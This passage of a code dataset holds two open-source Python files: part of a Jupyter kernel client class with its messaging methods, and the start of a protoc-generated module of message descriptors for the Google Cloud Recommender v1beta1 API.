        if self._iopub_channel is None:
            url = self._make_url('iopub')
            self.log.debug("connecting iopub channel to %s", url)
            socket = self.connect_iopub()
            self._iopub_channel = self.iopub_channel_class(
                socket, self.session, self.ioloop
            )
        return self._iopub_channel
    @property
    def stdin_channel(self):
        """Get the stdin channel object for this kernel."""
        if self._stdin_channel is None:
            url = self._make_url('stdin')
            self.log.debug("connecting stdin channel to %s", url)
            socket = self.connect_stdin(identity=self.session.bsession)
            self._stdin_channel = self.stdin_channel_class(
                socket, self.session, self.ioloop
            )
        return self._stdin_channel
    @property
    def hb_channel(self):
        """Get the hb channel object for this kernel."""
        if self._hb_channel is None:
            url = self._make_url('hb')
            self.log.debug("connecting heartbeat channel to %s", url)
            self._hb_channel = self.hb_channel_class(
                self.context, self.session, url
            )
        return self._hb_channel
    def is_alive(self):
        """Is the kernel process still running?"""
        from .manager import KernelManager
        if isinstance(self.parent, KernelManager):
            # This KernelClient was created by a KernelManager,
            # we can ask the parent KernelManager:
            return self.parent.is_alive()
        if self._hb_channel is not None:
            # We don't have access to the KernelManager,
            # so we use the heartbeat.
            return self._hb_channel.is_beating()
        else:
            # no heartbeat and not local, we can't tell if it's running,
            # so naively return True
            return True
    # Methods to send specific messages on channels
    def execute(self, code, silent=False, store_history=True,
                user_expressions=None, allow_stdin=None, stop_on_error=True):
        """Execute code in the kernel.
        Parameters
        ----------
        code : str
            A string of code in the kernel's language.
        silent : bool, optional (default False)
            If set, the kernel will execute the code as quietly possible, and
            will force store_history to be False.
        store_history : bool, optional (default True)
            If set, the kernel will store command history. This is forced
            to be False if silent is True.
        user_expressions : dict, optional
            A dict mapping names to expressions to be evaluated in the user's
            dict. The expression values are returned as strings formatted using
            :func:`repr`.
        allow_stdin : bool, optional (default self.allow_stdin)
            Flag for whether the kernel can send stdin requests to frontends.
            Some frontends (e.g. the Notebook) do not support stdin requests.
            If raw_input is called from code executed from such a frontend, a
            StdinNotImplementedError will be raised.
        stop_on_error: bool, optional (default True)
            Flag whether to abort the execution queue, if an exception is encountered.
        Returns
        -------
        The msg_id of the message sent.
        """
        if user_expressions is None:
            user_expressions = {}
        if allow_stdin is None:
            allow_stdin = self.allow_stdin
        # Don't waste network traffic if inputs are invalid
        if not isinstance(code, string_types):
            raise ValueError('code %r must be a string' % code)
        validate_string_dict(user_expressions)
        # Create class for content/msg creation. Related to, but possibly
        # not in Session.
        content = dict(code=code, silent=silent, store_history=store_history,
                       user_expressions=user_expressions,
                       allow_stdin=allow_stdin, stop_on_error=stop_on_error
                       )
        msg = self.session.msg('execute_request', content)
        self.shell_channel.send(msg)
        return msg['header']['msg_id']
    def complete(self, code, cursor_pos=None):
        """Tab complete text in the kernel's namespace.
        Parameters
        ----------
        code : str
            The context in which completion is requested.
            Can be anything between a variable name and an entire cell.
        cursor_pos : int, optional
            The position of the cursor in the block of code where the completion was requested.
            Default: ``len(code)``
        Returns
        -------
        The msg_id of the message sent.
        """
        if cursor_pos is None:
            cursor_pos = len(code)
        content = dict(code=code, cursor_pos=cursor_pos)
        msg = self.session.msg('complete_request', content)
        self.shell_channel.send(msg)
        return msg['header']['msg_id']
    def inspect(self, code, cursor_pos=None, detail_level=0):
        """Get metadata information about an object in the kernel's namespace.
        It is up to the kernel to determine the appropriate object to inspect.
        Parameters
        ----------
        code : str
            The context in which info is requested.
            Can be anything between a variable name and an entire cell.
        cursor_pos : int, optional
            The position of the cursor in the block of code where the info was requested.
            Default: ``len(code)``
        detail_level : int, optional
            The level of detail for the introspection (0-2)
        Returns
        -------
        The msg_id of the message sent.
        """
        if cursor_pos is None:
            cursor_pos = len(code)
        content = dict(code=code, cursor_pos=cursor_pos,
                       detail_level=detail_level,
                       )
        msg = self.session.msg('inspect_request', content)
        self.shell_channel.send(msg)
        return msg['header']['msg_id']
    def history(self, raw=True, output=False, hist_access_type='range', **kwargs):
        """Get entries from the kernel's history list.
        Parameters
        ----------
        raw : bool
            If True, return the raw input.
        output : bool
            If True, then return the output as well.
        hist_access_type : str
            'range' (fill in session, start and stop params), 'tail' (fill in n)
            or 'search' (fill in pattern param).
        session : int
            For a range request, the session from which to get lines. Session
            numbers are positive integers; negative ones count back from the
            current session.
        start : int
            The first line number of a history range.
        stop : int
            The final (excluded) line number of a history range.
        n : int
            The number of lines of history to get for a tail request.
        pattern : str
            The glob-syntax pattern for a search request.
        Returns
        -------
        The ID of the message sent.
        """
        if hist_access_type == 'range':
            # Sensible defaults: current session, from the first line.
            kwargs.setdefault('session', 0)
            kwargs.setdefault('start', 0)
        content = dict(raw=raw, output=output, hist_access_type=hist_access_type,
                       **kwargs)
        msg = self.session.msg('history_request', content)
        self.shell_channel.send(msg)
        return msg['header']['msg_id']
    def kernel_info(self):
        """Request kernel info
        Returns
        -------
        The msg_id of the message sent
        """
        msg = self.session.msg('kernel_info_request')
        self.shell_channel.send(msg)
        return msg['header']['msg_id']
    def comm_info(self, target_name=None):
        """Request comm info
        Returns
        -------
        The msg_id of the message sent
        """
        if target_name is None:
            content = {}
        else:
            content = dict(target_name=target_name)
        msg = self.session.msg('comm_info_request', content)
        self.shell_channel.send(msg)
        return msg['header']['msg_id']
    def _handle_kernel_info_reply(self, msg):
        """handle kernel info reply
        sets protocol adaptation version. This might
        be run from a separate thread.
        """
        adapt_version = int(msg['content']['protocol_version'].split('.')[0])
        if adapt_version != major_protocol_version:
            self.session.adapt_version = adapt_version
    def shutdown(self, restart=False):
        """Request an immediate kernel shutdown.
        Upon receipt of the (empty) reply, client code can safely assume that
        the kernel has shut down and it's safe to forcefully terminate it if
        it's still alive.
        The kernel will send the reply via a function registered with Python's
        atexit module, ensuring it's truly done as the kernel is done with all
        normal operation.
        Returns
        -------
        The msg_id of the message sent
        """
        # Send quit message to kernel. Once we implement kernel-side setattr,
        # this should probably be done that way, but for now this will do.
        msg = self.session.msg('shutdown_request', {'restart':restart})
        self.shell_channel.send(msg)
        return msg['header']['msg_id']
    def is_complete(self, code):
        """Ask the kernel whether some code is complete and ready to execute."""
        msg = self.session.msg('is_complete_request', {'code': code})
        self.shell_channel.send(msg)
        return msg['header']['msg_id']
    def input(self, string):
        """Send a string of raw input to the kernel.
        This should only be called in response to the kernel sending an
        ``input_request`` message on the stdin channel.
        """
        content = dict(value=string)
        msg = self.session.msg('input_reply', content)
        self.stdin_channel.send(msg)
KernelClientABC.register(KernelClient)
| apache-2.0 |
tseaver/google-cloud-python | recommender/google/cloud/recommender_v1beta1/proto/recommender_service_pb2.py | 2 | 35581 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/recommender_v1beta1/proto/recommender_service.proto
import sys
# Py2/Py3 shim: on Python 2 string literals pass through unchanged; on
# Python 3 the generated latin-1 text literals are re-encoded to bytes.
_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode("latin1"))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Default symbol database in which the generated message types are registered.
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.cloud.recommender_v1beta1.proto import (
recommendation_pb2 as google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2,
)
from google.longrunning import (
operations_pb2 as google_dot_longrunning_dot_operations__pb2,
)
from google.api import client_pb2 as google_dot_api_dot_client__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/recommender_v1beta1/proto/recommender_service.proto",
package="google.cloud.recommender.v1beta1",
syntax="proto3",
serialized_options=_b(
"\n$com.google.cloud.recommender.v1beta1B\020RecommenderProtoP\001ZKgoogle.golang.org/genproto/googleapis/cloud/recommender/v1beta1;recommender\242\002\004CREC\252\002!Google.Cloud.Recommmender.V1Beta1"
),
serialized_pb=_b(
'\n@google/cloud/recommender_v1beta1/proto/recommender_service.proto\x12 google.cloud.recommender.v1beta1\x1a\x1cgoogle/api/annotations.proto\x1a;google/cloud/recommender_v1beta1/proto/recommendation.proto\x1a#google/longrunning/operations.proto\x1a\x17google/api/client.proto"c\n\x1aListRecommendationsRequest\x12\x0e\n\x06parent\x18\x01 \x01(\t\x12\x11\n\tpage_size\x18\x02 \x01(\x05\x12\x12\n\npage_token\x18\x03 \x01(\t\x12\x0e\n\x06\x66ilter\x18\x05 \x01(\t"\x81\x01\n\x1bListRecommendationsResponse\x12I\n\x0frecommendations\x18\x01 \x03(\x0b\x32\x30.google.cloud.recommender.v1beta1.Recommendation\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t"(\n\x18GetRecommendationRequest\x12\x0c\n\x04name\x18\x01 \x01(\t"\xe3\x01\n MarkRecommendationClaimedRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12m\n\x0estate_metadata\x18\x02 \x03(\x0b\x32U.google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry\x12\x0c\n\x04\x65tag\x18\x03 \x01(\t\x1a\x34\n\x12StateMetadataEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01"\xe7\x01\n"MarkRecommendationSucceededRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12o\n\x0estate_metadata\x18\x02 \x03(\x0b\x32W.google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry\x12\x0c\n\x04\x65tag\x18\x03 \x01(\t\x1a\x34\n\x12StateMetadataEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01"\xe1\x01\n\x1fMarkRecommendationFailedRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12l\n\x0estate_metadata\x18\x02 \x03(\x0b\x32T.google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry\x12\x0c\n\x04\x65tag\x18\x03 \x01(\t\x1a\x34\n\x12StateMetadataEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 
\x01(\t:\x02\x38\x01\x32\xf7\t\n\x0bRecommender\x12\xe3\x01\n\x13ListRecommendations\x12<.google.cloud.recommender.v1beta1.ListRecommendationsRequest\x1a=.google.cloud.recommender.v1beta1.ListRecommendationsResponse"O\x82\xd3\xe4\x93\x02I\x12G/v1beta1/{parent=projects/*/locations/*/recommenders/*}/recommendations\x12\xd2\x01\n\x11GetRecommendation\x12:.google.cloud.recommender.v1beta1.GetRecommendationRequest\x1a\x30.google.cloud.recommender.v1beta1.Recommendation"O\x82\xd3\xe4\x93\x02I\x12G/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}\x12\xf1\x01\n\x19MarkRecommendationClaimed\x12\x42.google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest\x1a\x30.google.cloud.recommender.v1beta1.Recommendation"^\x82\xd3\xe4\x93\x02X"S/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markClaimed:\x01*\x12\xf7\x01\n\x1bMarkRecommendationSucceeded\x12\x44.google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest\x1a\x30.google.cloud.recommender.v1beta1.Recommendation"`\x82\xd3\xe4\x93\x02Z"U/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markSucceeded:\x01*\x12\xee\x01\n\x18MarkRecommendationFailed\x12\x41.google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest\x1a\x30.google.cloud.recommender.v1beta1.Recommendation"]\x82\xd3\xe4\x93\x02W"R/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markFailed:\x01*\x1aN\xca\x41\x1arecommender.googleapis.com\xd2\x41.https://www.googleapis.com/auth/cloud-platformB\xb2\x01\n$com.google.cloud.recommender.v1beta1B\x10RecommenderProtoP\x01ZKgoogle.golang.org/genproto/googleapis/cloud/recommender/v1beta1;recommender\xa2\x02\x04\x43REC\xaa\x02!Google.Cloud.Recommmender.V1Beta1b\x06proto3'
),
dependencies=[
google_dot_api_dot_annotations__pb2.DESCRIPTOR,
google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2.DESCRIPTOR,
google_dot_longrunning_dot_operations__pb2.DESCRIPTOR,
google_dot_api_dot_client__pb2.DESCRIPTOR,
],
)
# Machine-generated descriptor for the ListRecommendationsRequest message
# (fields: parent, page_size, page_token, filter). Emitted by protoc;
# do not edit by hand.
_LISTRECOMMENDATIONSREQUEST = _descriptor.Descriptor(
    name="ListRecommendationsRequest",
    full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    fields=[
        _descriptor.FieldDescriptor(
            name="parent",
            full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest.parent",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="page_size",
            full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest.page_size",
            index=1,
            number=2,
            type=5,
            cpp_type=1,
            label=1,
            has_default_value=False,
            default_value=0,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="page_token",
            full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest.page_token",
            index=2,
            number=3,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="filter",
            full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest.filter",
            index=3,
            number=5,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=255,
    serialized_end=354,
)
# Machine-generated descriptor for the ListRecommendationsResponse message
# (fields: recommendations, next_page_token). Emitted by protoc; do not
# edit by hand.
_LISTRECOMMENDATIONSRESPONSE = _descriptor.Descriptor(
    name="ListRecommendationsResponse",
    full_name="google.cloud.recommender.v1beta1.ListRecommendationsResponse",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    fields=[
        _descriptor.FieldDescriptor(
            name="recommendations",
            full_name="google.cloud.recommender.v1beta1.ListRecommendationsResponse.recommendations",
            index=0,
            number=1,
            type=11,
            cpp_type=10,
            label=3,
            has_default_value=False,
            default_value=[],
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="next_page_token",
            full_name="google.cloud.recommender.v1beta1.ListRecommendationsResponse.next_page_token",
            index=1,
            number=2,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=357,
    serialized_end=486,
)
# Machine-generated descriptor for the GetRecommendationRequest message
# (single field: name). Emitted by protoc; do not edit by hand.
_GETRECOMMENDATIONREQUEST = _descriptor.Descriptor(
    name="GetRecommendationRequest",
    full_name="google.cloud.recommender.v1beta1.GetRecommendationRequest",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    fields=[
        _descriptor.FieldDescriptor(
            name="name",
            full_name="google.cloud.recommender.v1beta1.GetRecommendationRequest.name",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        )
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=488,
    serialized_end=528,
)
# Machine-generated descriptor for the map entry type backing the
# MarkRecommendationClaimedRequest.state_metadata map<string, string>
# field (serialized_options "8\001" marks it as a map entry). Emitted by
# protoc; do not edit by hand.
_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY = _descriptor.Descriptor(
    name="StateMetadataEntry",
    full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    fields=[
        _descriptor.FieldDescriptor(
            name="key",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry.key",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="value",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry.value",
            index=1,
            number=2,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=_b("8\001"),
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=706,
    serialized_end=758,
)
_MARKRECOMMENDATIONCLAIMEDREQUEST = _descriptor.Descriptor(
name="MarkRecommendationClaimedRequest",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="state_metadata",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.state_metadata",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="etag",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.etag",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=531,
serialized_end=758,
)
# protoc-generated descriptors for MarkRecommendationSucceededRequest and its
# state_metadata map-entry nested type (same layout as the Claimed variant).
_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY = _descriptor.Descriptor(
    name="StateMetadataEntry",
    full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    fields=[
        _descriptor.FieldDescriptor(
            name="key",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry.key",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="value",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry.value",
            index=1,
            number=2,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=_b("8\001"),
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=706,
    serialized_end=758,
)
_MARKRECOMMENDATIONSUCCEEDEDREQUEST = _descriptor.Descriptor(
    name="MarkRecommendationSucceededRequest",
    full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    fields=[
        _descriptor.FieldDescriptor(
            name="name",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.name",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="state_metadata",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.state_metadata",
            index=1,
            number=2,
            type=11,
            cpp_type=10,
            label=3,
            has_default_value=False,
            default_value=[],
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="etag",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.etag",
            index=2,
            number=3,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
    ],
    extensions=[],
    nested_types=[_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=761,
    serialized_end=992,
)
# protoc-generated descriptors for MarkRecommendationFailedRequest and its
# state_metadata map-entry nested type (same layout as the Claimed variant).
_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY = _descriptor.Descriptor(
    name="StateMetadataEntry",
    full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    fields=[
        _descriptor.FieldDescriptor(
            name="key",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry.key",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="value",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry.value",
            index=1,
            number=2,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=_b("8\001"),
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=706,
    serialized_end=758,
)
_MARKRECOMMENDATIONFAILEDREQUEST = _descriptor.Descriptor(
    name="MarkRecommendationFailedRequest",
    full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    fields=[
        _descriptor.FieldDescriptor(
            name="name",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.name",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="state_metadata",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.state_metadata",
            index=1,
            number=2,
            type=11,
            cpp_type=10,
            label=3,
            has_default_value=False,
            default_value=[],
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
        _descriptor.FieldDescriptor(
            name="etag",
            full_name="google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.etag",
            index=2,
            number=3,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=_b("").decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
        ),
    ],
    extensions=[],
    nested_types=[_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=995,
    serialized_end=1220,
)
# Late-bound cross-references that protoc emits after all descriptors exist:
# message-typed fields get their message_type, map entries get their
# containing_type, and every message type is registered on the file DESCRIPTOR.
_LISTRECOMMENDATIONSRESPONSE.fields_by_name[
    "recommendations"
].message_type = (
    google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION
)
_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY.containing_type = (
    _MARKRECOMMENDATIONCLAIMEDREQUEST
)
_MARKRECOMMENDATIONCLAIMEDREQUEST.fields_by_name[
    "state_metadata"
].message_type = _MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY
_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY.containing_type = (
    _MARKRECOMMENDATIONSUCCEEDEDREQUEST
)
_MARKRECOMMENDATIONSUCCEEDEDREQUEST.fields_by_name[
    "state_metadata"
].message_type = _MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY
_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY.containing_type = (
    _MARKRECOMMENDATIONFAILEDREQUEST
)
_MARKRECOMMENDATIONFAILEDREQUEST.fields_by_name[
    "state_metadata"
].message_type = _MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY
DESCRIPTOR.message_types_by_name[
    "ListRecommendationsRequest"
] = _LISTRECOMMENDATIONSREQUEST
DESCRIPTOR.message_types_by_name[
    "ListRecommendationsResponse"
] = _LISTRECOMMENDATIONSRESPONSE
DESCRIPTOR.message_types_by_name["GetRecommendationRequest"] = _GETRECOMMENDATIONREQUEST
DESCRIPTOR.message_types_by_name[
    "MarkRecommendationClaimedRequest"
] = _MARKRECOMMENDATIONCLAIMEDREQUEST
DESCRIPTOR.message_types_by_name[
    "MarkRecommendationSucceededRequest"
] = _MARKRECOMMENDATIONSUCCEEDEDREQUEST
DESCRIPTOR.message_types_by_name[
    "MarkRecommendationFailedRequest"
] = _MARKRECOMMENDATIONFAILEDREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ListRecommendationsRequest = _reflection.GeneratedProtocolMessageType(
"ListRecommendationsRequest",
(_message.Message,),
dict(
DESCRIPTOR=_LISTRECOMMENDATIONSREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request for the ``ListRecommendations`` method.
Attributes:
parent:
Required. The container resource on which to execute the
request. Acceptable formats: 1. "projects/[PROJECT\_NUMBER]/l
ocations/[LOCATION]/recommenders/[RECOMMENDER\_ID]", LOCATION
here refers to GCP Locations:
https://cloud.google.com/about/locations/
page_size:
Optional. The maximum number of results to return from this
request. Non-positive values are ignored. If not specified,
the server will determine the number of results to return.
page_token:
Optional. If present, retrieves the next batch of results from
the preceding call to this method. ``page_token`` must be the
value of ``next_page_token`` from the previous response. The
values of other method parameters must be identical to those
in the previous call.
filter:
Filter expression to restrict the recommendations returned.
Supported filter fields: state\_info.state Eg:
\`state\_info.state:"DISMISSED" or state\_info.state:"FAILED"
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.ListRecommendationsRequest)
),
)
_sym_db.RegisterMessage(ListRecommendationsRequest)
ListRecommendationsResponse = _reflection.GeneratedProtocolMessageType(
"ListRecommendationsResponse",
(_message.Message,),
dict(
DESCRIPTOR=_LISTRECOMMENDATIONSRESPONSE,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Response to the ``ListRecommendations`` method.
Attributes:
recommendations:
